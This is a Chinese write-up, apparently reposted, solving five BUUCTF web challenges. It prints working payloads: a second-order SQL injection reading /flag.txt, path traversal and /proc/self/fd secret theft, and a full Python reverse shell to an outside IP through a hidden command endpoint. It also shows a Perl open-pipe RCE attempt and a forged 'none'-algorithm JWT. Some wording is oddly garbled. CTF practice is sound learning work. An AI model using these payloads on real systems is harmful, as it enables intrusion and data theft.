BUUCTF-WEB(76-80)
CyberPunk参考:
[BUUCTF题解]CyberPunk - Article_kelp - 博客园 (cnblogs.com)
打开源码发现一个参数
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145452632-1800584713.png
然后我们先把所有页面的代码都获取了
我只放出了change.php的源代码
?file=php://filter/read=convert.base64-encode/resource=change.php<?php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单修改成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>修改收货地址</title>
<base href="./">
<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
</head>
<body>
<p >
</p>
<h1>修改收货地址</h1>
<form method="post">
<p>
<h3>姓名:</h3>
<input type="text"name="user_name">
<h3>电话:</h3>
<input type="text"name="phone">
<h3>地址:</h3>
<input type="text"name="address">
</p>
<p>
<button class='btn btn-lgbtn-sub btn-white' type="submit">修改订单</button>
</p>
</form>
<?php global $msg; echo '<h2 >'.$msg.'</h2>';?>
<p >
</p>
<h2 >订单管理</h2>
<a target="_blank" href="https://www.cnblogs.com/./index.php">
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
</a>
<a target="_blank" href="https://www.cnblogs.com/./search.php">
<button>我要查订单</button>
</a>
<a target="_blank" href="https://www.cnblogs.com/./delete.php">
<button>我不想要了</button>
</a>
</body>
</html>对change.php审计可以注意到会直接利用旧的address字段,显然可以在二次注入。
然后我们就现在注册的时候把注入语句存入address字段中,然后我们再去修改页面,修改一些信息,触发sql语句,然后在查询页面可以看到注入的结果
我们先爆数据库
首先创建订单
',`address`=database()#https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145451877-685381613.png
然后修改订单
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145449620-1473914822.png
然后查看订单,就爆出库了
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145445846-401232391.png
接下来也不消爆库爆表了,flag在flag.txt,重复同样的步骤搞一遍
',`address`=(select(load_file("/flag.txt")))#https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145442714-464116515.png
[网鼎杯 2020 白虎组]PicDown
参考:
[网鼎杯 2020 白虎组]PicDown_ctf welcome 23333333333-CSDN博客
Linux的/proc/self/学习_proc self-CSDN博客
有一个输入框,输入之后发现url产生变化
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145438972-200645454.png
然后我想试试是不是文件包罗,发现是没有一点反应的
file:///etc/passwd那我再试试是不是目次穿越
../etc/passwd然后下载的时候他是一个图片,但是我记事本打开发现了文件被读取了
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145438502-2070076376.png
然后我们试试常规的flag文件,然后就出来了
../flaghttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145437733-985393276.png
然后搜了wp,这是非预期解,我们看看预期的怎么个事
预期解
我们已经知道了是文件读取,然后我们看一下命令/proc/self/cmdline
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145437283-1518472968.png
然后我们看到这个python文件叫做app.py,我们现在看一下他的源码
/page?url=app.pyfrom flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
app = Flask(__name__)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
@app.route('/')
def index():
return render_template('search.html')
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"
return res
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)我们注意到刚开始从文件中读取了一个SECRET_KEY,然后之后把文件删了,我们也读取不到了,但注意到他没有关闭这个文件其时,所以我们可以在/proc/self/fd/xxx找到这个文件
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145436674-1571809341.png
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145436020-211361912.png
那我们去试试获取一下这个文件,读取key
/page?url=/proc/self/fd/3https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145434202-739315660.png
97cbE/DWH2jLX3/bmDEX93UFnUPaOgDB/F8CTxph0Ek=有了这个KEY我们看一下后面,在/no_one_know_the_manager这个页面,我们会传入一个key,当它等于SECRET_KEY这个值,我们会传入一个shell参数,然后就会命令执行,而我们也获取到了key
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145433741-1524922274.png
但是os.system没有回显,我们选择反弹shell,这边我用棱角社区天生的,记得选择python谁人[~]#棱角 ::Edge.Forum* (ywhack.com)
/no_one_know_the_manager?key=97cbE/DWH2jLX3/bmDEX93UFnUPaOgDB/F8CTxph0Ek=&shell=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.130.131.63",1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);%27https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145433201-171059077.png
SSRFme
参考:
HITCON 2017]SSRFme 1-CSDN博客
[刷题HITCON 2017]SSRFme - kar3a - 博客园 (cnblogs.com)
【HITCON 2017】SSRFme——最简单伪协议思路 - CAP_T - 博客园 (cnblogs.com)
打开题目就是一个源码甩过来
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145432694-1453705728.png
我么在这里看一下代码,我们在XFF字段传入一个ip,然后会创建出一个目次,名字为orange+ip的md5加密过后,此处我都用的127.0.0.1
然后我们的工作目次就会酿成这个新天生的目次,然后我们会传入一个参数url,利用了GET来进行文件的执行操作,
file_put_contents(basename($info["basename"]), $data);这个将我们linux命令天生的结果,放入了文件中(如果传入的文件名是123,那么$data就被放入sandox/cfbb870b58817bf7705c0bd826e8dba7/123中)
然后我们先试试读取文件
?url=./../../&filename=123然后访问
/sandbox/cfbb870b58817bf7705c0bd826e8dba7/123https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145431718-436757211.png
然后我们去看看根目次的文件
?url=./../../../../../&filename=123然后访问
/sandbox/cfbb870b58817bf7705c0bd826e8dba7/123https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145431209-921285625.png
然后我们直接访问flag是空的,我们看到后面readflag是二进制文件,访问后就可以下载下来,所以我们应该运行readflag才气得到我们心心念念的flag
利用perl语言的漏洞:由于GET函数在底层调用了perl语言中的open函数,但是该函数存在rce漏洞。
我们先创造一个同名的文件
?url=&filename=|/readflag然后
?url=file:|readflag&filename=123但是我发现没有用,还是得不到flag
然后就看到大佬利用一句话木马得到flag【HITCON 2017】SSRFme——最简单伪协议思路 - CAP_T - 博客园 (cnblogs.com)
file_put_contents函数利用data伪协议控制其内容,这里想通过GET后加data伪协议实现写马,但是我这里也失败了。
大概环境出了问题。
Welcome to Earth
参考:b01lers2020]Welcome to Earth_welcome to earth 1-CSDN博客
打开页面就是我嘎了,但是URL已经成/die,我们去掉看看,他很快就又跳转了,我们抓包来搞
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145430492-112190018.png
我们去这里/chase看看
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145429908-1005174117.png
然后我们去/leftt看一下吧,别的都是绝路一条
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145429394-1211397950.png
然后我们再去/shoot看一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145428920-2098395532.png
然后去/door看一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145428476-474626814.png
然后我们再去这个js文件看一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145427754-460113851.png
然后再去/open看一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145427334-1476178242.png
再访问一下这个js文件
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145426748-1084880319.png
然后再去/fight看看
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145426339-577735740.png
然后js
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145425820-154335478.png
这里应该是乱了,我们给他规复一下
from itertools import permutations
flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]
item = permutations(flag)
for i in item:
k = ''.join(list(i))
if k.startswith('pctf{hey_boys') and k[-1] == '}':
print(k)pctf{hey_boys_im_baaaaaaaaaack!}EasyLogin
参考:
[HFCTF2020]EasyLogin-1|JWT身份伪造 - upfine - 博客园 (cnblogs.com)
HFCTF2020]EasyLogin保姆级详解。-CSDN博客
F12查看源码,发现app.js,我们去看一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145425317-1475294037.png
题目告诉我们是koa框架,代码内部有个/api/flag,我们去了解一下这个框架nodeJs 进阶Koa项目布局详解 - des杜甫 - 博客园 (cnblogs.com)
然后我们去访问一一下/controllers/api.js,找到一个jwt天生以及和flag相关的函数
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145424415-1184842326.png
天生jwt利用了HS256加密的,但是我们只要,当加密时利用的是 none 方法,验证时只要密钥处为undefined或者空之类的,即便后面的算法指名为 HS256,验证也还是按照 none 来验证通过,那这样的话我们就可以直接伪造jwt的信息了,我们就改下面几个字段
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145423603-1866023393.png
改成如下的
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145422687-1398766998.png
但是啊,这个网页是无法搞出来的,所以我们需要脚本天生,先去下载PyJWT这个库
import jwt
token = jwt.encode(
{
"secretid": [],
"username": "admin",
"password": "123",
"iat": 1718346154
},
algorithm="none", key="").encode(encoding='utf-8')
print(token)eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMyIsImlhdCI6MTcxODM0NjE1NH0.然后登录的时候抓包,修改
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145422097-1761180933.png
然后点击get flag
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240614145421285-290429224.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]